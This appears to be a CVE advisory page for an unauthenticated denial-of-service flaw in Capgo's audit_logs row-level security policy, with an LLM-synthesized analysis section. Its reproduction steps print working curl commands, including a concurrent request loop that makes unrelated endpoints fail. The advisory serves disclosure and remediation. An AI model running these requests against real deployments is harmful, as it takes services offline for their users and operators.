Capgo - Unauthenticated Denial-of-Service via audit_logs RLS Policy
Description
Cap-go capgo (capgo-backend) before 12.128.12 contains an unauthenticated denial-of-service vulnerability arising from the audit_logs table's Row-Level Security (RLS) policy when accessed via the Supabase PostgREST API. Because the PostgreSQL query planner executes costly logic before RLS rejection, unfiltered queries to the public.audit_logs endpoint using the public anon key consistently trigger statement timeouts (PostgREST error 57014). Under concurrency, this exhausts database resources and causes cascading HTTP 500 failures on unrelated endpoints (e.g. /orgs), resulting in an application-layer denial of service.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
2- Range: <12.128.12
Patches
Vulnerability mechanics
Root cause
"The PostgreSQL query planner executes costly logic before the RLS policy rejects unauthorized access to the audit_logs table, allowing unauthenticated queries to trigger statement timeouts."
Attack vector
An unauthenticated attacker sends unfiltered queries (e.g. `?select=id&limit=1`) to the `/rest/v1/audit_logs` endpoint using the publicly exposed Supabase anon key. The PostgreSQL query planner executes costly logic before the RLS policy rejects the request, causing a statement timeout (error 57014). Under concurrency, this exhausts database resources and causes unrelated endpoints (e.g. `/orgs`) to return HTTP 500 errors, resulting in application-layer denial of service [ref_id=1].
Affected code
The `public.audit_logs` table and its Row-Level Security (RLS) policy, accessed via the Supabase PostgREST API endpoint `/rest/v1/audit_logs`.
What the fix does
The advisory does not include a patch diff. The recommended remediation is to revise the RLS policy on `public.audit_logs` so that the query planner rejects unauthorized access before executing expensive logic, or to remove public access to the endpoint entirely [ref_id=1].
Preconditions
- configAttacker must know the Supabase project URL and the publicly exposed anon key
- authNo authentication required; the anon key is publicly available
- networkAttacker must be able to send HTTP requests to the PostgREST API
- inputUnfiltered query (no restrictive WHERE clause) to the audit_logs endpoint
Reproduction
**Step 1 – Trigger timeout with a single unauthenticated request** ``` curl -sk -i \ "$SUPA_URL/rest/v1/audit_logs?select=id&limit=1" \ -H "apikey: $SUPA_ANON" \ -H "Authorization: Bearer $SUPA_ANON" ``` Result: HTTP 500 with `{"message":"canceling statement due to statement timeout"}`.
**Step 2 – Filtered request (control case)** ``` curl -sk -o /dev/null -w 'HTTP=%{http_code} time=%{time_total}\n' \ "$SUPA_URL/rest/v1/audit_logs?select=id&limit=1&org_id=eq.00000000-0000-0000-0000-000000000000" \ -H "apikey: $SUPA_ANON" \ -H "Authorization: Bearer $SUPA_ANON" ``` Result: HTTP 200 (fast response).
**Step 3 – Cascading failure (DoS amplification)** ``` ( seq 8 | xargs -P 8 -I{} sh -c \ 'curl -sk "$SUPA_URL/rest/v1/audit_logs?select=id&limit=1" \ -H "apikey: $SUPA_ANON" -H "Authorization: Bearer $SUPA_ANON" >/dev/null' ) & sleep 0.2 curl -sk -o /dev/null -w 'HTTP=%{http_code} time=%{time_total}\n' \ "$SUPA_URL/rest/v1/orgs?select=id&limit=1" \ -H "apikey: $SUPA_ANON" \ -H "Authorization: Bearer $SUPA_ANON" ``` Observed: HTTP 500 on the `/orgs` endpoint.
Generated on Jun 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2- github.com/Cap-go/capgo/security/advisories/GHSA-5vgv-rqj5-5748mitrevendor-advisory
- www.vulncheck.com/advisories/capgo-unauthenticated-denial-of-service-via-audit-logs-rls-policymitrethird-party-advisory
News mentions
0No linked articles in our index yet.